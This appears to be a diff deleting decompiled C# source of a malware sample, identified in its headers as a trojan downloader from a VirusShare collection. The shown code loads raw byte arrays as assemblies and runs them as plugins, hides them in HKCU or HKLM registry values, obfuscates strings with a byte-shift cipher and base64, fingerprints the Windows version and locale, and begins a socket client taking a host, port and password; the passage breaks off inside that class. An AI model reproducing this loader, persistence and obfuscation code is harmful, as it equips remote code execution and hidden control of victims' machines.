public static SortedList<Guid, byte[]> \u0658ൊ\u136BȤÐ\u0BD9ݵ\u00A0ᥣ = new SortedList<Guid, byte[]>();
|
|
||||||
public static SortedList<Guid, IPlugin> \u0EBAឯᐗ̧ฅ = new SortedList<Guid, IPlugin>();
|
|
||||||
private static string ᧆᕝ\u0831Ǫ᪱\u0F1Bؒ\u1CB5 = string.Empty;
|
|
||||||
|
|
||||||
public static event bֲᶋ.ጇȾྂᘍ ᬍᶭੳᷱ੯\u1CFF;
|
|
||||||
|
|
||||||
public static void \u06DFṭ()
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
BinaryFormatter binaryFormatter = new BinaryFormatter();
|
|
||||||
MemoryStream serializationStream = new MemoryStream();
|
|
||||||
binaryFormatter.Serialize((Stream) serializationStream, (object) bֲᶋ.\u0658ൊ\u136BȤÐ\u0BD9ݵ\u00A0ᥣ);
|
|
||||||
serializationStream.Close();
|
|
||||||
byte[] numArray = ґ.êᰉ\u0EA4(serializationStream.ToArray(), false);
|
|
||||||
if (ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.\u05C5\u066CҼƹߛƹ == RegistryHive.CurrentUser)
|
|
||||||
Registry.CurrentUser.CreateSubKey(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ᒳኣˋୣʎ\u1249ᯋĢ).SetValue(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ᡀ\u0EA4, (object) numArray);
|
|
||||||
else
|
|
||||||
Registry.LocalMachine.CreateSubKey(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ᒳኣˋୣʎ\u1249ᯋĢ).SetValue(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ᡀ\u0EA4, (object) numArray);
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void \u082Aᨫ() => new Thread((ThreadStart) (() =>
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
BinaryFormatter binaryFormatter = new BinaryFormatter();
|
|
||||||
MemoryStream memoryStream;
|
|
||||||
byte[] numArray;
|
|
||||||
if (ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.\u05C5\u066CҼƹߛƹ == RegistryHive.CurrentUser)
|
|
||||||
{
|
|
||||||
MemoryStream serializationStream = new MemoryStream(ґ.ᢝҳᔏ\u0C54ᇗᎶᓠয̙(Registry.CurrentUser.CreateSubKey(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ᒳኣˋୣʎ\u1249ᯋĢ).GetValue(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ᡀ\u0EA4) as byte[], false));
|
|
||||||
bֲᶋ.\u0658ൊ\u136BȤÐ\u0BD9ݵ\u00A0ᥣ = binaryFormatter.Deserialize((Stream) serializationStream) as SortedList<Guid, byte[]>;
|
|
||||||
serializationStream.Close();
|
|
||||||
serializationStream.Dispose();
|
|
||||||
memoryStream = (MemoryStream) null;
|
|
||||||
numArray = (byte[]) null;
|
|
||||||
}
|
|
||||||
else
|
|
||||||
{
|
|
||||||
MemoryStream serializationStream = new MemoryStream(ґ.ᢝҳᔏ\u0C54ᇗᎶᓠয̙(Registry.LocalMachine.CreateSubKey(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ᒳኣˋୣʎ\u1249ᯋĢ).GetValue(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ᡀ\u0EA4) as byte[], false));
|
|
||||||
bֲᶋ.\u0658ൊ\u136BȤÐ\u0BD9ݵ\u00A0ᥣ = binaryFormatter.Deserialize((Stream) serializationStream) as SortedList<Guid, byte[]>;
|
|
||||||
serializationStream.Close();
|
|
||||||
serializationStream.Dispose();
|
|
||||||
memoryStream = (MemoryStream) null;
|
|
||||||
numArray = (byte[]) null;
|
|
||||||
}
|
|
||||||
foreach (byte[] Ꮲభி႖ቧ in (IEnumerable<byte[]>) bֲᶋ.\u0658ൊ\u136BȤÐ\u0BD9ݵ\u00A0ᥣ.Values)
|
|
||||||
bֲᶋ.ᠣ\u0863֢੧Ἦ(Ꮲభி႖ቧ);
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
})).Start();
|
|
||||||
|
|
||||||
public static void ग़\u0C5C\u1394ፋ᧗\u17EF᭰Ϳ() => new Thread((ThreadStart) (() =>
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
if (Assembly.GetExecutingAssembly().GetManifestResourceNames().Length == 0)
|
|
||||||
return;
|
|
||||||
ResourceManager resourceManager = new ResourceManager("p", Assembly.GetExecutingAssembly());
|
|
||||||
int num = (int) resourceManager.GetObject("Len");
|
|
||||||
for (int index = 0; index < num; ++index)
|
|
||||||
{
|
|
||||||
byte[] Ꮲభி႖ቧ = (byte[]) resourceManager.GetObject(index.ToString());
|
|
||||||
Array.Reverse((Array) Ꮲభி႖ቧ);
|
|
||||||
bֲᶋ.ᠣ\u0863֢੧Ἦ(Ꮲభி႖ቧ);
|
|
||||||
}
|
|
||||||
if (!ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ൺግ)
|
|
||||||
return;
|
|
||||||
bֲᶋ.\u06DFṭ();
|
|
||||||
}
|
|
||||||
catch (Exception ex)
|
|
||||||
{
|
|
||||||
Console.WriteLine(ex.Message);
|
|
||||||
}
|
|
||||||
})).Start();
|
|
||||||
|
|
||||||
public static bool ᠣ\u0863֢੧Ἦ(byte[] Ꮲభி႖ቧ)
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
foreach (Type type in Assembly.Load(Ꮲభி႖ቧ).GetTypes())
|
|
||||||
{
|
|
||||||
int num = 0;
|
|
||||||
if (type.IsClass && type.IsSubclassOf(typeof (IPlugin)))
|
|
||||||
{
|
|
||||||
IPlugin instance = (IPlugin) Activator.CreateInstance(type);
|
|
||||||
if (instance.ExecuteOnLoad)
|
|
||||||
{
|
|
||||||
instance.Initialize();
|
|
||||||
bֲᶋ.պ႖\u0CD3ᦜভᜬڳ((object) null, instance, instance.ExecuteOnLoadArgs);
|
|
||||||
}
|
|
||||||
if (!bֲᶋ.\u0658ൊ\u136BȤÐ\u0BD9ݵ\u00A0ᥣ.ContainsKey(instance.Guid))
|
|
||||||
bֲᶋ.\u0658ൊ\u136BȤÐ\u0BD9ݵ\u00A0ᥣ.Add(instance.Guid, Ꮲభி႖ቧ);
|
|
||||||
else
|
|
||||||
++num;
|
|
||||||
if (!bֲᶋ.\u0EBAឯᐗ̧ฅ.ContainsKey(instance.Guid))
|
|
||||||
bֲᶋ.\u0EBAឯᐗ̧ฅ.Add(instance.Guid, instance);
|
|
||||||
else
|
|
||||||
++num;
|
|
||||||
bֲᶋ.ᧆᕝ\u0831Ǫ᪱\u0F1Bؒ\u1CB5 = string.Empty;
|
|
||||||
if (num == 2)
|
|
||||||
{
|
|
||||||
bֲᶋ.ᧆᕝ\u0831Ǫ᪱\u0F1Bؒ\u1CB5 = instance.Name + ґ.ᖢ("gWeIs7msqKtHDG9PwGeau7a5rKs=", true);
|
|
||||||
return false;
|
|
||||||
}
|
|
||||||
if (bֲᶋ.ᕂᨭ֩\u0EECᶥ\u0C49\u136Eѥܖ != null)
|
|
||||||
bֲᶋ.ᕂᨭ֩\u0EECᶥ\u0C49\u136Eѥܖ((object) null, instance);
|
|
||||||
return true;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
bֲᶋ.ᧆᕝ\u0831Ǫ᪱\u0F1Bؒ\u1CB5 = ґ.ᖢ("eKGWqKhVrJ6pnVV+haGqnJ6jVTU/EsSeo6map5uWmJpVo6SpVZukqqOZYw==", true);
|
|
||||||
}
|
|
||||||
catch (Exception ex)
|
|
||||||
{
|
|
||||||
Console.WriteLine(ex.Message);
|
|
||||||
bֲᶋ.ᧆᕝ\u0831Ǫ᪱\u0F1Bؒ\u1CB5 = ex.Message;
|
|
||||||
}
|
|
||||||
return false;
|
|
||||||
}
|
|
||||||
|
|
||||||
public static bool Ꮻʛၯ(IPlugin _param0)
|
|
||||||
{
|
|
||||||
if (!bֲᶋ.\u0EBAឯᐗ̧ฅ.ContainsKey(_param0.Guid))
|
|
||||||
{
|
|
||||||
bֲᶋ.\u0EBAឯᐗ̧ฅ.Add(_param0.Guid, _param0);
|
|
||||||
bֲᶋ.ᧆᕝ\u0831Ǫ᪱\u0F1Bؒ\u1CB5 = string.Empty;
|
|
||||||
if (bֲᶋ.ᕂᨭ֩\u0EECᶥ\u0C49\u136Eѥܖ != null)
|
|
||||||
bֲᶋ.ᕂᨭ֩\u0EECᶥ\u0C49\u136Eѥܖ((object) null, _param0);
|
|
||||||
return true;
|
|
||||||
}
|
|
||||||
bֲᶋ.ᧆᕝ\u0831Ǫ᪱\u0F1Bؒ\u1CB5 = _param0.Name + ґ.ᖢ("gWeIs7msqKtHDG9PwGeau7a5rKs=", true);
|
|
||||||
return false;
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void \u05FCθ͍ᖘ\u08C4ᜰ\u17FE༨(Guid _param0)
|
|
||||||
{
|
|
||||||
if (!bֲᶋ.\u0EBAឯᐗ̧ฅ.ContainsKey(_param0))
|
|
||||||
return;
|
|
||||||
bֲᶋ.\u0658ൊ\u136BȤÐ\u0BD9ݵ\u00A0ᥣ.Remove(_param0);
|
|
||||||
bֲᶋ.\u0EBAឯᐗ̧ฅ.Remove(_param0);
|
|
||||||
}
|
|
||||||
|
|
||||||
public static string ᣖ\u135Bঝ() => bֲᶋ.ᧆᕝ\u0831Ǫ᪱\u0F1Bؒ\u1CB5;
|
|
||||||
|
|
||||||
public static void պ႖\u0CD3ᦜভᜬڳ(object _param0, IPlugin _param1, PluginArgs ᨁᣇᦪʾߒஞ) => new Thread((ThreadStart) (() =>
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
_param1.Execute(_param0, ᨁᣇᦪʾߒஞ);
|
|
||||||
}
|
|
||||||
catch (Exception ex)
|
|
||||||
{
|
|
||||||
Console.WriteLine(ex.Message);
|
|
||||||
}
|
|
||||||
})).Start();
|
|
||||||
|
|
||||||
public static void \u0BFBᷛἣಠỠ()
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
if (!ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ൺግ)
|
|
||||||
return;
|
|
||||||
if (ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.\u05C5\u066CҼƹߛƹ == RegistryHive.CurrentUser)
|
|
||||||
Registry.CurrentUser.CreateSubKey(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ᒳኣˋୣʎ\u1249ᯋĢ).DeleteValue(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ᡀ\u0EA4);
|
|
||||||
else
|
|
||||||
Registry.LocalMachine.CreateSubKey(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ᒳኣˋୣʎ\u1249ᯋĢ).DeleteValue(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ᡀ\u0EA4);
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
public delegate void ጇȾྂᘍ(object sender, IPlugin plugin);
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,116 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: ᥟޱഁेࠃᵷᣚ.ϵᲀࠛᬣׯ᷶
|
|
||||||
// Assembly: lgy, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: F6858297-EDCC-46A7-BF64-CBC6BE6B3CD4
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.ej-8021b1adb21670f837224cd99ccee8599abd7a84c7c3cf7b87df9da753a7739c.exe
|
|
||||||
|
|
||||||
using System;
|
|
||||||
using System.Runtime.InteropServices;
|
|
||||||
|
|
||||||
namespace ᥟޱഁेࠃᵷᣚ
|
|
||||||
{
|
|
||||||
internal class ϵ\u1C80ࠛᬣ\u05EF\u0DB2\u10CB\u1DF6
|
|
||||||
{
|
|
||||||
public static string ᤒ\u0D59ᐙᘔᏆᨨᎡ\u09B5()
|
|
||||||
{
|
|
||||||
OperatingSystem osVersion = Environment.OSVersion;
|
|
||||||
string str = "";
|
|
||||||
if (osVersion.Platform.ToString() == "Win32NT")
|
|
||||||
{
|
|
||||||
switch (ϵ\u1C80ࠛᬣ\u05EF\u0DB2\u10CB\u1DF6.\u1CD4(osVersion.Version))
|
|
||||||
{
|
|
||||||
case "4.1.2222":
|
|
||||||
str = ґ.ᖢ("6Pr/9QCRUTJTCASxysk=", true);
|
|
||||||
break;
|
|
||||||
case "4.1.2600":
|
|
||||||
str = ґ.ᖢ("6Pr/9QAIkVEyUwSxysnk1g==", true);
|
|
||||||
break;
|
|
||||||
case "4.9.3000":
|
|
||||||
str = ґ.ᖢ("[WINME]", true);
|
|
||||||
break;
|
|
||||||
case "5.0.2195":
|
|
||||||
str = ґ.ᖢ("LT9EOkVN1pnCBkn2CAYGBg==", true);
|
|
||||||
break;
|
|
||||||
case "5.1.2600":
|
|
||||||
case "5.2.3790":
|
|
||||||
str = ґ.ᖢ("LT9EOkXWmcIGTUn2LiY=", true);
|
|
||||||
break;
|
|
||||||
case "6.0.6000":
|
|
||||||
case "6.0.6001":
|
|
||||||
case "6.0.6002":
|
|
||||||
case "6.0.6003":
|
|
||||||
str = ґ.ᖢ("LT9EOkVN1pnCBkn2LD9JSjc=", true);
|
|
||||||
break;
|
|
||||||
case "6.1.7600":
|
|
||||||
case "6.1.7601":
|
|
||||||
case "6.1.7602":
|
|
||||||
case "6.1.7603":
|
|
||||||
str = ґ.ᖢ("LT9EOtaZwgZFTUn2DQ==", true);
|
|
||||||
break;
|
|
||||||
default:
|
|
||||||
str = ґ.ᖢ("K0RB1pnCBkRFTUQ=", true);
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
string empty = string.Empty;
|
|
||||||
ϵ\u1C80ࠛᬣ\u05EF\u0DB2\u10CB\u1DF6.\u08DFы\u0E86ᔡబ\u0C0Dᷡ ыᔡబᷡ = new ϵ\u1C80ࠛᬣ\u05EF\u0DB2\u10CB\u1DF6.\u08DFы\u0E86ᔡబ\u0C0Dᷡ();
|
|
||||||
ыᔡబᷡ.\u1C8D\u0B70ߠᅳଇᠫ = Marshal.SizeOf(typeof (ϵ\u1C80ࠛᬣ\u05EF\u0DB2\u10CB\u1DF6.\u08DFы\u0E86ᔡబ\u0C0Dᷡ));
|
|
||||||
if (ϵ\u1C80ࠛᬣ\u05EF\u0DB2\u10CB\u1DF6.ᰢళ(ref ыᔡబᷡ))
|
|
||||||
{
|
|
||||||
if (ыᔡబᷡ.\u07C2ॵᰬ.ToString().Contains(ґ.ᖢ("KTtITD85O9aZwgb2Jjc5QfYH", true)))
|
|
||||||
str += ґ.ᖢ("ATThiXfOMRI=", true);
|
|
||||||
if (ыᔡబᷡ.\u07C2ॵᰬ.ToString().Contains(ґ.ᖢ("KTtITD85O9aZwgb2Jjc5QfYI", true)))
|
|
||||||
str += ґ.ᖢ("ATThiXfOMRM=", true);
|
|
||||||
if (ыᔡబᷡ.\u07C2ॵᰬ.ToString().Contains(ґ.ᖢ("KTtITD85O9aZwgb2Jjc5QfYJ", true)))
|
|
||||||
str += ґ.ᖢ("ATThiXfOMRQ=", true);
|
|
||||||
if (ыᔡబᷡ.\u07C2ॵᰬ.ToString().Contains(ґ.ᖢ("KTtITD85O9aZwgb2Jjc5QfYK", true)))
|
|
||||||
str += ґ.ᖢ("ATThiXfOMRU=", true);
|
|
||||||
if (ыᔡబᷡ.\u07C2ॵᰬ.ToString().Contains(ґ.ᖢ("NEZTV0pERuGJd84BMUJETAEW", true)))
|
|
||||||
str += ґ.ᖢ("ATThiXfOMRY=", true);
|
|
||||||
if (ыᔡబᷡ.\u07C2ॵᰬ.ToString().Contains(ґ.ᖢ("NEZTV0pERuGJd84BMUJETAEX", true)))
|
|
||||||
str += ґ.ᖢ("vvGeKgce7tQ=", true);
|
|
||||||
if (ыᔡబᷡ.\u07C2ॵᰬ.ToString().Contains(ґ.ᖢ("NEZTV0pERuGJd84BMUJETAEY", true)))
|
|
||||||
str += ґ.ᖢ("vvGeKgce7tU=", true);
|
|
||||||
if (ыᔡబᷡ.\u07C2ॵᰬ.ToString().Contains(ґ.ᖢ("NEZTV0pERuGJd84BMUJETAEZ", true)))
|
|
||||||
str += ґ.ᖢ("vvGeKgce7tY=", true);
|
|
||||||
if (ыᔡబᷡ.\u07C2ॵᰬ.ToString().Contains(ґ.ᖢ("NEZTV0pERuGJd84BMUJETAEa", true)))
|
|
||||||
str += ґ.ᖢ("vvGeKgce7tc=", true);
|
|
||||||
}
|
|
||||||
return !ϵ\u1C80ࠛᬣ\u05EF\u0DB2\u10CB\u1DF6.\u1BA3ɗ() ? str + ґ.ᖢ("vsu+nioHHhbW1A==", true) : str + ґ.ᖢ("vsu+nioHHhbU0g==", true);
|
|
||||||
}
|
|
||||||
|
|
||||||
private static string \u1CD4(Version _param0) => _param0.Major.ToString() + "." + _param0.Minor.ToString() + "." + _param0.Build.ToString();
|
|
||||||
|
|
||||||
[DllImport("kernel32.dll", EntryPoint = "GetVersionEx")]
|
|
||||||
private static extern bool ᰢళ(
|
|
||||||
ref ϵ\u1C80ࠛᬣ\u05EF\u0DB2\u10CB\u1DF6.\u08DFы\u0E86ᔡబ\u0C0Dᷡ _param0);
|
|
||||||
|
|
||||||
public static bool \u1BA3ɗ()
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
return !string.IsNullOrEmpty(Environment.GetEnvironmentVariable("ProgramW6432"));
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
return false;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
public struct \u08DFы\u0E86ᔡబ\u0C0Dᷡ
|
|
||||||
{
|
|
||||||
public int \u1C8D\u0B70ߠᅳଇᠫ;
|
|
||||||
public int \u1B02ᯥ;
|
|
||||||
public int ᴧۤౡिᛔ\u0EF8ͷ\u0013֙;
|
|
||||||
public int \u1042\u009C;
|
|
||||||
public int ᔛ౦֤ܚᎬᏖྍ\u0FF5\u0025;
|
|
||||||
[MarshalAs(UnmanagedType.ByValTStr, SizeConst = 128)]
|
|
||||||
public string \u07C2ॵᰬ;
|
|
||||||
public short ਯᚏᦂDzڐẶഉ۷;
|
|
||||||
public short \u0AC9ởಷỎᆪఙٴ;
|
|
||||||
public short Аᯱกህԍգᄐ;
|
|
||||||
public byte ܫౘ\u0F09ᴂᱚҞ;
|
|
||||||
public byte \u19E8ጝᢇ\u08C3ୖңলĥྦ;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,134 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: ᥟޱഁेࠃᵷᣚ.ґ
|
|
||||||
// Assembly: lgy, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: F6858297-EDCC-46A7-BF64-CBC6BE6B3CD4
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.ej-8021b1adb21670f837224cd99ccee8599abd7a84c7c3cf7b87df9da753a7739c.exe
|
|
||||||
|
|
||||||
using System;
|
|
||||||
using System.Collections.Generic;
|
|
||||||
using System.IO;
|
|
||||||
using System.IO.Compression;
|
|
||||||
using System.Text;
|
|
||||||
|
|
||||||
namespace ᥟޱഁेࠃᵷᣚ
|
|
||||||
{
|
|
||||||
internal class ґ
|
|
||||||
{
|
|
||||||
public static byte[] êᰉ\u0EA4(byte[] ᮻ, bool _param1)
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
int num = new Random().Next(-2000000000, 2000000000);
|
|
||||||
for (int index = 0; index < ᮻ.Length; ++index)
|
|
||||||
ᮻ[index] = (ᮻ[index] += (byte) num);
|
|
||||||
List<byte> byteList = new List<byte>();
|
|
||||||
byteList.AddRange((IEnumerable<byte>) ᮻ);
|
|
||||||
byte[] bytes = BitConverter.GetBytes(num);
|
|
||||||
byteList.InsertRange(byteList.Count / 2, (IEnumerable<byte>) bytes);
|
|
||||||
byte[] array = byteList.ToArray();
|
|
||||||
byteList.Clear();
|
|
||||||
return _param1 ? Encoding.ASCII.GetBytes(Convert.ToBase64String(array)) : array;
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
return (byte[]) null;
|
|
||||||
}
|
|
||||||
|
|
||||||
public static byte[] ᢝҳᔏ\u0C54ᇗᎶᓠয̙(byte[] _param0, bool _param1)
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
List<byte> byteList1 = new List<byte>(_param1 ? (IEnumerable<byte>) Convert.FromBase64String(Encoding.ASCII.GetString(_param0)) : (IEnumerable<byte>) _param0);
|
|
||||||
int int32 = BitConverter.ToInt32(byteList1.GetRange((byteList1.Count - 4) / 2, 4).ToArray(), 0);
|
|
||||||
byteList1.RemoveRange((byteList1.Count - 4) / 2, 4);
|
|
||||||
for (int index1 = 0; index1 < byteList1.Count; ++index1)
|
|
||||||
{
|
|
||||||
List<byte> byteList2;
|
|
||||||
int index2;
|
|
||||||
byteList1[index1] = (byteList2 = byteList1)[index2 = index1] = (byte) ((uint) byteList2[index2] - (uint) (byte) int32);
|
|
||||||
}
|
|
||||||
byte[] array = byteList1.ToArray();
|
|
||||||
byteList1.Clear();
|
|
||||||
return array;
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
return (byte[]) null;
|
|
||||||
}
|
|
||||||
|
|
||||||
public static string \u07C0ᵯ(string ᕃǐ, bool _param1)
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
int num = new Random().Next(-2000000000, 2000000000);
|
|
||||||
byte[] bytes1 = Encoding.GetEncoding(1252).GetBytes(ᕃǐ);
|
|
||||||
for (int index = 0; index < bytes1.Length; ++index)
|
|
||||||
bytes1[index] += (byte) num;
|
|
||||||
List<byte> byteList = new List<byte>();
|
|
||||||
byteList.AddRange((IEnumerable<byte>) bytes1);
|
|
||||||
byte[] bytes2 = BitConverter.GetBytes(num);
|
|
||||||
byteList.InsertRange(byteList.Count / 2, (IEnumerable<byte>) bytes2);
|
|
||||||
byte[] array = byteList.ToArray();
|
|
||||||
byteList.Clear();
|
|
||||||
return _param1 ? Convert.ToBase64String(array) : Encoding.GetEncoding(1252).GetString(array);
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
return string.Empty;
|
|
||||||
}
|
|
||||||
|
|
||||||
public static string ᖢ(string _param0, bool _param1)
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
List<byte> byteList1 = new List<byte>(_param1 ? (IEnumerable<byte>) Convert.FromBase64String(_param0) : (IEnumerable<byte>) Encoding.GetEncoding(1252).GetBytes(_param0));
|
|
||||||
int int32 = BitConverter.ToInt32(byteList1.GetRange((byteList1.Count - 4) / 2, 4).ToArray(), 0);
|
|
||||||
byteList1.RemoveRange((byteList1.Count - 4) / 2, 4);
|
|
||||||
for (int index1 = 0; index1 < byteList1.Count; ++index1)
|
|
||||||
{
|
|
||||||
List<byte> byteList2;
|
|
||||||
int index2;
|
|
||||||
byteList1[index1] = (byteList2 = byteList1)[index2 = index1] = (byte) ((uint) byteList2[index2] - (uint) (byte) int32);
|
|
||||||
}
|
|
||||||
byte[] array = byteList1.ToArray();
|
|
||||||
byteList1.Clear();
|
|
||||||
return Encoding.GetEncoding(1252).GetString(array);
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
return string.Empty;
|
|
||||||
}
|
|
||||||
|
|
||||||
public static byte[] ᣤᩯ̷\u1879ᙲ(byte[] _param0)
|
|
||||||
{
|
|
||||||
MemoryStream memoryStream = new MemoryStream();
|
|
||||||
using (GZipStream gzipStream = new GZipStream((Stream) memoryStream, CompressionMode.Compress, true))
|
|
||||||
gzipStream.Write(_param0, 0, _param0.Length);
|
|
||||||
memoryStream.Position = 0L;
|
|
||||||
byte[] numArray = new byte[memoryStream.Length];
|
|
||||||
memoryStream.Read(numArray, 0, numArray.Length);
|
|
||||||
byte[] dst = new byte[numArray.Length + 4];
|
|
||||||
Buffer.BlockCopy((Array) numArray, 0, (Array) dst, 4, numArray.Length);
|
|
||||||
Buffer.BlockCopy((Array) BitConverter.GetBytes(_param0.Length), 0, (Array) dst, 0, 4);
|
|
||||||
return dst;
|
|
||||||
}
|
|
||||||
|
|
||||||
public static byte[] \u0B70ᶓ\u05EC\u1BF8ɧ\u0AFF\u1DF6ᳮ(byte[] _param0)
|
|
||||||
{
|
|
||||||
using (MemoryStream memoryStream = new MemoryStream())
|
|
||||||
{
|
|
||||||
int int32 = BitConverter.ToInt32(_param0, 0);
|
|
||||||
memoryStream.Write(_param0, 4, _param0.Length - 4);
|
|
||||||
byte[] buffer = new byte[int32];
|
|
||||||
memoryStream.Position = 0L;
|
|
||||||
using (GZipStream gzipStream = new GZipStream((Stream) memoryStream, CompressionMode.Decompress))
|
|
||||||
gzipStream.Read(buffer, 0, buffer.Length);
|
|
||||||
return buffer;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,29 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: ᥟޱഁेࠃᵷᣚ.ܡ
|
|
||||||
// Assembly: lgy, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: F6858297-EDCC-46A7-BF64-CBC6BE6B3CD4
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.ej-8021b1adb21670f837224cd99ccee8599abd7a84c7c3cf7b87df9da753a7739c.exe
|
|
||||||
|
|
||||||
using System.Runtime.InteropServices;
|
|
||||||
using System.Text;
|
|
||||||
|
|
||||||
namespace ᥟޱഁेࠃᵷᣚ
|
|
||||||
{
|
|
||||||
internal class ܡ
|
|
||||||
{
|
|
||||||
private const uint \u0F17ʂࠞ\u0AF0ˌ = 1024;
|
|
||||||
private const uint \u00B0ߗẑ\u136EᎁȄᨹᑡᆾ = 4098;
|
|
||||||
|
|
||||||
[DllImport("kernel32.dll", EntryPoint = "GetLocaleInfo")]
|
|
||||||
private static extern int ᨔ(uint _param0, uint ਘ, [Out] StringBuilder _param2, int ᔊմZ);
|
|
||||||
|
|
||||||
private static string \u10CF\u007Cᣈတ\u0F2A(uint _param0)
|
|
||||||
{
|
|
||||||
StringBuilder stringBuilder = new StringBuilder(256);
|
|
||||||
int num = ܡ.ᨔ(1024U, _param0, stringBuilder, stringBuilder.Capacity);
|
|
||||||
return num > 0 ? stringBuilder.ToString().Substring(0, num - 1) : string.Empty;
|
|
||||||
}
|
|
||||||
|
|
||||||
public static string เᙾᅖ\u1C4Aᦹkژ() => ܡ.\u10CF\u007Cᣈတ\u0F2A(4098U);
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,258 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: ᥟޱഁेࠃᵷᣚ.ࣶᝀࣃ
|
|
||||||
// Assembly: lgy, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: F6858297-EDCC-46A7-BF64-CBC6BE6B3CD4
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.ej-8021b1adb21670f837224cd99ccee8599abd7a84c7c3cf7b87df9da753a7739c.exe
|
|
||||||
|
|
||||||
using System;
|
|
||||||
using System.Collections.Generic;
|
|
||||||
using System.IO;
|
|
||||||
using System.Net.Sockets;
|
|
||||||
using System.Text;
|
|
||||||
using System.Threading;
|
|
||||||
|
|
||||||
namespace ᥟޱഁेࠃᵷᣚ
|
|
||||||
{
|
|
||||||
internal class \u08F6ᝀ\u08C3
|
|
||||||
{
|
|
||||||
private Socket ᶏ݉ࡂᕄ;
|
|
||||||
private bool ࠆ;
|
|
||||||
private Thread ផᡷᑰ̣\u0FCC;
|
|
||||||
private Thread Үय़ඕ\u0382\u1BFB\u0E89กఊໞ;
|
|
||||||
private string ᅻᮈᗬ;
|
|
||||||
private int ṑ;
|
|
||||||
private string ག\u00F7ఎ\u1BFFഏ\u02D8\u1391G\u089B;
|
|
||||||
|
|
||||||
public \u08F6ᝀ\u08C3(string Host, int Port, string Password)
|
|
||||||
{
|
|
||||||
this.ᅻᮈᗬ = Host;
|
|
||||||
this.ṑ = Port;
|
|
||||||
this.ག\u00F7ఎ\u1BFFഏ\u02D8\u1391G\u089B = Password;
|
|
||||||
this.ࠆ = false;
|
|
||||||
}
|
|
||||||
|
|
||||||
public Socket \u0B4Bୡ\u0EFD => this.ᶏ݉ࡂᕄ;
|
|
||||||
|
|
||||||
public bool ᦹ => this.ࠆ;
|
|
||||||
|
|
||||||
public string \u1ADA => this.ᅻᮈᗬ;
|
|
||||||
|
|
||||||
public int \u1DE0ᰄי => this.ṑ;
|
|
||||||
|
|
||||||
public string ᎣՒ\u0DCEḖ => this.ག\u00F7ఎ\u1BFFഏ\u02D8\u1391G\u089B;
|
|
||||||
|
|
||||||
public void \u0E31ฬࠎЙ() => this.ᨆᡢᬸल\u09E5ᣃቪᚖЙ();
|
|
||||||
|
|
||||||
private void ᨆᡢᬸल\u09E5ᣃቪᚖЙ()
|
